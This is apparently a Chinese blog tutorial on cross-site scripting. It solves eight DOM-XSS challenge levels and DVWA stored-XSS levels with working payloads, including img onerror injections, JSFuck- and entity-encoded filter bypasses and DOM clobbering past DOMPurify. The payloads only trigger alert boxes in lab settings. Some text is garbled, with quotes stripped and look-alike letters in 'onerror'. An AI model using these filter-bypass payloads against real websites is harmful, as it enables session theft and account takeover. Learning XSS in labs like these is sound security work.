个人创建网站程序,网络优化培训要多少钱,代理平台返点,做代理需要网站吗目录
XSS简单介绍
一、反射型 1、漏洞逻辑#xff1a;
为什么有些标签可以触发#xff0c;有些标签不能触发
可以触发的标签
不能触发的标签
为什么某些标签能触发而某些不能
二、DOM型
1、Ma Spaghet!
要求#xff1a;
分析#xff1a;
结果#xff1a;
2、J…目录
XSS简单介绍
一、反射型 1、漏洞逻辑
为什么有些标签可以触发有些标签不能触发
可以触发的标签
不能触发的标签
为什么某些标签能触发而某些不能
二、DOM型
1、Ma Spaghet!
要求
分析
结果
2、Jefff
要求
分析
结果
3、Ugandan Knuckles
要求
分析
结果
4、Ricardo Milos
要求
分析
结果
5、Ah Thats Hawt
要求
分析
结果
6、Ligma
要求
分析
结果
7、Mafia
要求
分析
结果
8、Ok, Boomer
要求
分析
结果
三、存储型
漏洞原理
复现
low等级
Medium等级
high等级 XSS简单介绍 XSS是一种网络安全漏洞允许攻击者通过注入恶意脚本到网页中影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
一、反射型 1、漏洞逻辑 前端可以解析js的而反射型的漏洞语句也是js用户输入js代码没有很好的过滤就将 js代码放到前端进行解析形成漏洞。 注意并不是所有的标签都可以随意写XSS不解析反而可能会暴露 常用的js方法 alert() confirm() prompt()
js都继承了一个祖先window所以容易出问题 为什么有些标签可以触发有些标签不能触发
可以触发的标签
在反射型XSS中多种HTML标签在特定条件下都能被用来触发攻击。这些标签通常包含事件处理器属性如onerror、onmouseover、onclick等这些属性可以执行JavaScript代码。以下是一些常见的可以触发XSS攻击的标签及其示例 img通过onerror事件处理器当图片加载失败时会执行其中的JavaScript代码。例如img srcx onerroralert(XSS) script最直接的方式用于直接插入并执行JavaScript代码。然而在许多情况下script标签会被过滤因此攻击者需要寻找绕过这些过滤的方法。 a通过href属性使用伪协议如javascript:或结合onclick事件处理器来触发XSS。例如a hrefjavascript:alert(XSS)Click me/a input、button等表单元素这些元素可以通过onclick、onsubmit等事件处理器来触发XSS。
不能触发的标签
并非所有HTML标签都能直接用于触发XSS攻击。一些标签由于不包含可执行的JavaScript代码或事件处理器属性因此不能直接用于此目的。然而需要注意的是即使某些标签本身不能直接触发XSS它们也可能被用于构建更复杂的攻击场景例如通过修改DOM结构来间接影响可触发XSS的标签。
一般来说以下类型的标签不太可能直接触发XSS攻击
纯展示性标签如p、h1等这些标签仅用于展示文本内容不包含任何可执行代码或事件处理器。
无事件处理器的标签如果标签本身不包含或不允许添加事件处理器属性如onclick、onerror等则它们不能直接用于触发XSS。
为什么某些标签能触发而某些不能 事件处理器属性能够触发XSS的标签通常包含事件处理器属性这些属性允许在特定事件发生时执行JavaScript代码。 过滤机制许多Web应用程序会实现输入过滤机制以阻止或限制script等危险标签的插入。因此即使某些标签在理论上可以触发XSS但在实际应用中可能会受到过滤机制的限制。 浏览器安全策略现代浏览器实现了多种安全策略来防止XSS攻击包括内容安全策略CSP、同源策略等。这些策略可以限制或禁止某些类型的脚本执行或资源加载。
二、DOM型 使用在线的dom型xss平台
1、Ma Spaghet!
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 传递的所有参数直接放进了h2标签里
scriptalert(1)/script 而这标签官方认为危险被禁用所以尝试用img标签innerHTML 只能过滤script/script
?somebodyimg%20src1%20οnerrοralert(1337)
结果 2、Jefff 要求 弹出1337不能和用户交互不可以用类似标签点击 分析 我们可以看到给h2传参使用的是innerText所以我们想在maname.innerText ma上面做基 本不可能了。我们只能考虑在eval中做
尝试1闭合双引号之后在其中闭合双引号。 原理是eval(ma Ma name aaa ;alert(12);) 尝试输入?jeffaaa;alert(1337);
尝试2可以使用连接符的方式来做 尝试输入?jeffasd ;-alert(12)-
结果 3、Ugandan Knuckles
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 wey wey.replace(/[]/g, ) ----- 过滤了 和
尝试闭合双引号。 weyaaa οnclickalert(1337) 但是会与用户交互 onfocus不可以自动聚焦所以我们还需要一个函数autofocus来自动聚焦这样就不需要用户 的参与就可以触发了。
尝试输入?weyaaaοnfοcusalert(1337)autofocustrue
结果 4、Ricardo Milos
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 这段代码的意思为在2秒后对from表单进行提交提交的位置就是ricardo.action 接收到的路 径路径由get参数中的ricardo提供。在action中可以识别js伪协议
尝试?ricardojavascript:alert(1337)
结果 5、Ah Thats Hawt
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 smith smith.replace(/[\(\\)\\]/g, ) 过滤了括号反引号转义字符。 smith.replace进行了过滤但是我们可以使用编码的方式来绕过它的过滤
尝试markassbrownleeimg src1 οnerrοralert(1) 传递的参数在url中所以如果我们直接将1336进行urlcode编码浏览器传递给smith时会 自动解码但是在url中要遵守url规则不能直接传递实体编码
实体编码 markassbrownleeimg src1 οnerrοralert#40;1336#41;
urlcode编码 markassbrownleeimg src1 οnerrοralert%26%2340%3B1336%26%2341%3B 结果 6、Ligma
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 过滤了字母和数字然后直接eval这得用JSFuck绕过可以将正常的js代码混淆为 只包含[, ], (, ), !, 这6种字符的字符串 输入 alert(1337) JSFuck加密
[][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]](({}[])[!![]](![][])[![]!![]]([][[]][])[![]!![]!![]](!![][])[!![]](!![][])[[]][][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]]([][[]][])[[]]([][[]][])[!![]]([][[]][])[![]!![]!![]](![][])[![]!![]!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]]([][][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]](![][])[![]!![]]([]{})[!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]](!![][])[[]]([][[]][])[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]])(![]!![]!![]!![]!![]!![]))[![]!![]!![]]([][[]][])[![]!![]!![]])(![]!![])([][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]]([][[]][])[![]!![]!![]](![][])[![]!![]!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]]([][][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]](![][])[![]!![]]([]{})[!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]](!![][])[[]]([][[]][])[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]])(![]!![]!![]!![]!![]!![]))[![]!![]!![]]([][[]][])[![]!![]!![]])(![]!![]!![]!![]!![]!![]!![])(([]{})[[]])[[]](![]!![][])(![]!![]!![]!![]!![]!![]!![]!![][]))(!![][])(![]!![]!![][])(![]!![]!![][])(![]!![]!![]!![]!![]!![]!![][])[][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]]([][[]][])[[]]([][[]][])[!![]]([][[]][])[![]!![]!![]](![][])[![]!![]!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]]([][][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]](![][])[![]!![]]([]{})[!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]](!![][])[[]]([][[]][])[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]])(![]!![]!![]!![]!![]!![]))[![]!![]!![]]([][[]][])[![]!![]!![]])(![]!![])([][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]]([][[]][])[![]!![]!![]](![][])[![]!![]!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]]([][][(![][])[![]!![]!![]]([]{})[!![]](!![][])[!![]](!![][])[[]]][([]{})[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]](![][])[![]!![]!![]](!![][])[[]](!![][])[!![]]([][[]][])[[]]([]{})[![]!![]!![]!![]!![]](!![][])[[]]([]{})[!![]](!![][])[!![]]]((!![][])[!![]]([][[]][])[![]!![]!![]](!![][])[[]]([][[]][])[[]](!![][])[!![]]([][[]][])[!![]]([]{})[![]!![]!![]!![]!![]!![]!![]](![][])[![]!![]]([]{})[!![]]([]{})[![]!![]!![]!![]!![]]({}[])[!![]](!![][])[[]]([][[]][])[![]!![]!![]!![]!![]]([]{})[!![]]([][[]][])[!![]])(![]!![]!![]!![]!![]!![]))[![]!![]!![]]([][[]][])[![]!![]!![]])(![]!![]!![]!![]!![]!![]!![])(([]{})[[]])[[]](![]!![][])(![]!![]!![]!![]!![]!![]!![]!![]!![][])))(![]!![])
url编码
%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()
尝试输入
?balls%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()
结果 7、Mafia
要求 弹出1337不能和用户交互不可以用类似标签点击 分析 过滤了 截取长度50的字符串 - ! \ [ ] 被替换为_ alert被替换为_
定义匿名函数利用匿名函数的参数构造payload同时使用正则表达式来绕过alert字符串的检测。
?mafiaFunction(/ALERT(1337)/.source.toLowerCase())() 或者利用数字和字符串之间的互相转换来绕过针对alert的检测。
?mafiaeval(8680439..toString(30))(1337)
结果 8、Ok, Boomer
要求 弹出1337不能和用户交互不可以用类似标签点击 分析
使用了DOMPurify这个第三方库来过滤非法字符
setTimeout(ok, 2000)中的ok可以接收一个函数或者字符串如果我们能够向ok这个变量注入可执行的payload那么也就能成功弹框
可以使用DOM Clobbering的方式通过向HTML注入DOM元素来实现操作JavaScript变量
先构造一个变量ok通过创建一个idok的DOM元素来实现ok需要接受一个字符串作为值而在对标签调用toString()方法时会返回属性href的值可以选择标签作为构造对象
通过查看DOMPurify的源码可以发现它支持的合法的协议有mailto, tel, xmpp等等
尝试输入 ?boomera%20idok%20hrefmailto:alert(1337)
结果 三、存储型
漏洞原理
存储型XSS又称持久型XSS攻击脚本被永久地存放在目标服务器的数据库或文件中具有很高的隐蔽性。 存储型XSS与反射型XSS不同的是存储型XSS是攻击者将恶意的payload通过留言板、博客系统发送至后台服务器存储起来当其他用户访问这个页面时就会受到攻击不需要用户手动点击payload便可完成攻击。
复现
low等级 进入low等级的xss存储型模块 尝试通过简单的JavaScript语句进行攻击 先将其安全等级改为低 Xss (Stored) stripslashes
mysqli_real_escape_string 数据最后插入显示到index.php 将我们的恶意代码试着插入进去查看一下是否可行 Medium等级 使用low等级的攻击方式 发现script被过滤
通过查看后端代码发现同存储型xss相同 也是过滤了script标签
用img标签
img%20src1%20οnerrοralert(1337) high等级 注此时要重新修改name输入栏的长度限制进行绕过
在high等级使用low等级和medium等级的攻击方式都不能成功
同反射性xss相同 在存储型xss注入high等级中 同样使用了replace函数对script标签进行了彻底的过滤
尝试img标签进行攻击
代码img srcx οnerrοralert(‘xss’)
